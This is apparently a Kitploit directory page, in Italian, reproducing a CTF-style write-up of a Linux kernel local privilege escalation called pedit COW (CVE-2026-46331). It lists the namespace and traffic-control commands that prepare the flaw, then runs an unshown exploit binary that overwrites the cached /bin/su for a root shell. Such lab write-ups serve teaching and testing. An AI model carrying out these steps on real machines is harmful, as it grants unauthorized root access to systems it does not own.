Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-46331-pedit-cow — Analisi e passaggi di sfruttamento per la vulnerabilità pedit COW (CVE-2026-46331) | Kitploit
Strumenti/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Escalation di PrivilegiExploitCTFApprendimento e FormazioneBinary Exploitation
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Analisi e passaggi di sfruttamento per la vulnerabilità pedit COW (CVE-2026-46331)

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
1 mese faNon ancora revisionato

CVE-2026-46331-pedit-cow

Descrizione e passaggi di sfruttamento per la vulnerabilità pedit COW (CVE-2026-46331).

Panoramica

Questa challenge dimostra pedit COW, un difetto del kernel Linux nel sottosistema di controllo del traffico per l'azione di modifica dei pacchetti (act_pedit). La vulnerabilità consente a un utente non privilegiato di sovrascrivere una copia in memoria di un binario setuid-root, ottenendo di fatto una shell root senza mai toccare il file sul disco.

Passaggi di Sfruttamento

1. Configurazione Iniziale

L'ambiente inizia come utente non privilegiato (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme

2. Escalation dei Privilegi (Creazione del Namespace)

Configurare il traffic-control normalmente richiede privilegi CAP_NET_ADMIN, di cui un utente normale è sprovvisto. Ho utilizzato namespace utente non privilegiati per ottenere questa capacità.

root@kitploit:~
unshare -r -n

3. Configurazione dell'Azione di Controllo del Traffico

All'interno del namespace, ho configurato il qdisc clsact e applicato un filtro per attivare l'azione pedit.

Pulisci eventuali configurazioni esistenti se necessario

root@kitploit:~
tc qdisc del dev lo clsact

Configura il qdisc e il filtro

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64

5. Esecuzione dell'Exploit

Dopo aver configurato l'ambiente, ho abbandonato la shell root e ho eseguito l'exploit come utente non privilegiato.

root@kitploit:~
exit
./packet_edit_meme

5. Risultato Finale

L'exploit ha sovrascritto con successo l'entry per /bin/su, fornendo una shell root interattiva.

root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Scarica lo strumento